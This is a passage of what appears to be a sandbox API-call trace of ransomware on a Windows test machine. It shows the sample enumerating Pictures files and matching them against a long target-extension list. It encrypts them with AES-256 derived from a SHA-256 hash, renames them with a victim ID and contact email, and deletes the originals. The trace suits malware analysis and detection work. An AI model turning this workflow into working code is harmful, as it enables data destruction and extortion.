3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0195.636] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0195.636] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0195.636] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\gbhwyejwrouo.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\gbhwyejwrouo.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0195.637] ReadFile (in: hFile=0x384, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x4bff, lpNumberOfBytesRead=0x18c060, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18c060*=0x4bff, lpOverlapped=0x0) returned 1
	[0195.639] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.639] CryptAcquireContextW (in: phProv=0x18bc10, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18bc10*=0xfcb5d8) returned 1
	[0195.640] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.640] CryptCreateHash (in: hProv=0xfcb5d8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18bc14 | out: phHash=0x18bc14) returned 1
	[0195.640] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.641] CryptHashData (hHash=0xfb9b30, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0195.641] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.641] CryptDeriveKey (in: hProv=0xfcb5d8, Algid=0x6610, hBaseData=0xfb9b30, dwFlags=0x1, phKey=0x18bc18 | out: phKey=0x18bc18*=0xfb9bf0) returned 1
	[0195.641] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.641] CryptEncrypt (in: hKey=0xfb9bf0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18bc2c*=0x4bff, dwBufLen=0x4bff | out: pbData=0x0*, pdwDataLen=0x18bc2c*=0x4c00) returned 1
	[0195.642] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0195.642] RtlMoveMemory (in: Destination=0xfe1d88, Source=0xfdd180, Length=0x4bff | out: Destination=0xfe1d88) 
	[0195.642] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.642] CryptEncrypt (in: hKey=0xfb9bf0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfe1d88*, pdwDataLen=0x18bc0c*=0x4bff, dwBufLen=0x4c00 | out: pbData=0xfe1d88*, pdwDataLen=0x18bc0c*=0x4c00) returned 1
	[0195.642] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.642] CryptDestroyKey (hKey=0xfb9bf0) returned 1
	[0195.643] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.643] CryptDestroyHash (hHash=0xfb9b30) returned 1
	[0195.643] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.643] CryptReleaseContext (hProv=0xfcb5d8, dwFlags=0x0) returned 1
	[0195.643] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0195.643] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18bc28, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18bc28*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0195.644] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.644] GetUserNameA (in: lpBuffer=0x18bb0c, pcbBuffer=0x18bc24 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18bc24) returned 1
	[0195.651] wsprintfW (in: param_1=0x18bc40, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\pictures\\gbhwyejwrouo.gif.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 89
	[0195.651] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\gbhwyejwrouo.gif.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\gbhwyejwrouo.gif.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0195.652] WriteFile (in: hFile=0x2c0, lpBuffer=0xfe1d88*, nNumberOfBytesToWrite=0x4c00, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0xfe1d88*, lpNumberOfBytesWritten=0x18c068*=0x4c00, lpOverlapped=0x0) returned 1
	[0195.654] CloseHandle (hObject=0x2c0) returned 1
	[0195.654] CloseHandle (hObject=0x384) returned 1
	[0195.654] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\gbhwyejwrouo.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\gbhwyejwrouo.gif")) returned 1
	[0195.668] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\gbhwyejwrouo.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\gbhwyejwrouo.gif")) returned 0
	[0195.668] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf2c5080, ftCreationTime.dwHighDateTime=0x1d97668, ftLastAccessTime.dwLowDateTime=0x85348a0, ftLastAccessTime.dwHighDateTime=0x1d97674, ftLastWriteTime.dwLowDateTime=0x85348a0, ftLastWriteTime.dwHighDateTime=0x1d97674, nFileSizeHigh=0x0, nFileSizeLow=0x7a44, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="gfN5uwHVoCA7iHHa.gif", cAlternateFileName="GFN5UW~1.GIF")) returned 1
	[0195.668] lstrcmpW (lpString1="gfN5uwHVoCA7iHHa.gif", lpString2="..") returned 1
	[0195.669] lstrcmpW (lpString1="gfN5uwHVoCA7iHHa.gif", lpString2=".") returned 1
	[0195.669] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Pictures\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\"
	[0195.669] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\", lpString2="gfN5uwHVoCA7iHHa.gif" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\gfN5uwHVoCA7iHHa.gif") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\gfN5uwHVoCA7iHHa.gif"
	[0195.669] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Pictures\\gfN5uwHVoCA7iHHa.gif") returned 51
	[0195.669] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0195.669] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Pictures\\gfN5uwHVoCA7iHHa.gif", cchLength=0x33 | out: lpsz="c:\\users\\rdhj0cnfevzx\\pictures\\gfn5uwhvoca7ihha.gif") returned 0x33
	[0195.669] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.669] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\gfn5uwhvoca7ihha.gif", lpSrch="help_decrypt_your_files") returned 0x0
	[0195.669] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\rdhj0cnfevzx\\pictures\\gfn5uwhvoca7ihha.gif" | out: lpString1="c:\\users\\rdhj0cnfevzx\\pictures\\gfn5uwhvoca7ihha.gif") returned="c:\\users\\rdhj0cnfevzx\\pictures\\gfn5uwhvoca7ihha.gif"
	[0195.669] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\pictures\\gfn5uwhvoca7ihha.gif") returned 51
	[0195.670] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0195.670] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.670] StrStrW (lpFirst=".gif", lpSrch=".") returned=".gif"
	[0195.670] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.670] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".gif") returned=".gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0195.670] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0195.671] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0195.671] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\gfn5uwhvoca7ihha.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\gfn5uwhvoca7ihha.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0195.673] ReadFile (in: hFile=0x384, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x7a44, lpNumberOfBytesRead=0x18c060, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18c060*=0x7a44, lpOverlapped=0x0) returned 1
	[0195.675] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.675] CryptAcquireContextW (in: phProv=0x18bc10, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18bc10*=0xfcb880) returned 1
	[0195.676] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.676] CryptCreateHash (in: hProv=0xfcb880, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18bc14 | out: phHash=0x18bc14) returned 1
	[0195.676] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.677] CryptHashData (hHash=0xfb98f0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0195.677] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.677] CryptDeriveKey (in: hProv=0xfcb880, Algid=0x6610, hBaseData=0xfb98f0, dwFlags=0x1, phKey=0x18bc18 | out: phKey=0x18bc18*=0xfb9bf0) returned 1
	[0195.677] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.677] CryptEncrypt (in: hKey=0xfb9bf0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18bc2c*=0x7a44, dwBufLen=0x7a44 | out: pbData=0x0*, pdwDataLen=0x18bc2c*=0x7a50) returned 1
	[0195.678] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0195.678] RtlMoveMemory (in: Destination=0xfe4bd0, Source=0xfdd180, Length=0x7a44 | out: Destination=0xfe4bd0) 
	[0195.678] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.678] CryptEncrypt (in: hKey=0xfb9bf0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfe4bd0*, pdwDataLen=0x18bc0c*=0x7a44, dwBufLen=0x7a50 | out: pbData=0xfe4bd0*, pdwDataLen=0x18bc0c*=0x7a50) returned 1
	[0195.679] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.680] CryptDestroyKey (hKey=0xfb9bf0) returned 1
	[0195.680] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.680] CryptDestroyHash (hHash=0xfb98f0) returned 1
	[0195.680] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.680] CryptReleaseContext (hProv=0xfcb880, dwFlags=0x0) returned 1
	[0195.680] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0195.680] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18bc28, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18bc28*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0195.681] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.681] GetUserNameA (in: lpBuffer=0x18bb0c, pcbBuffer=0x18bc24 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18bc24) returned 1
	[0195.683] wsprintfW (in: param_1=0x18bc40, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\pictures\\gfn5uwhvoca7ihha.gif.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 93
	[0195.683] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\gfn5uwhvoca7ihha.gif.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\gfn5uwhvoca7ihha.gif.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0195.684] WriteFile (in: hFile=0x2c0, lpBuffer=0xfe4bd0*, nNumberOfBytesToWrite=0x7a50, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0xfe4bd0*, lpNumberOfBytesWritten=0x18c068*=0x7a50, lpOverlapped=0x0) returned 1
	[0195.686] CloseHandle (hObject=0x2c0) returned 1
	[0195.686] CloseHandle (hObject=0x384) returned 1
	[0195.686] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\gfn5uwhvoca7ihha.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\gfn5uwhvoca7ihha.gif")) returned 1
	[0195.692] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\gfn5uwhvoca7ihha.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\gfn5uwhvoca7ihha.gif")) returned 0
	[0195.692] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x427e4950, ftCreationTime.dwHighDateTime=0x1d970be, ftLastAccessTime.dwLowDateTime=0xfcbe8cd0, ftLastAccessTime.dwHighDateTime=0x1d9717c, ftLastWriteTime.dwLowDateTime=0xfcbe8cd0, ftLastWriteTime.dwHighDateTime=0x1d9717c, nFileSizeHigh=0x0, nFileSizeLow=0xc6b3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="h-7UuNY_Qd0.bmp", cAlternateFileName="H-7UUN~1.BMP")) returned 1
	[0195.692] lstrcmpW (lpString1="h-7UuNY_Qd0.bmp", lpString2="..") returned 1
	[0195.692] lstrcmpW (lpString1="h-7UuNY_Qd0.bmp", lpString2=".") returned 1
	[0195.692] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Pictures\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\"
	[0195.692] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\", lpString2="h-7UuNY_Qd0.bmp" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\h-7UuNY_Qd0.bmp") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\h-7UuNY_Qd0.bmp"
	[0195.692] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Pictures\\h-7UuNY_Qd0.bmp") returned 46
	[0195.692] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
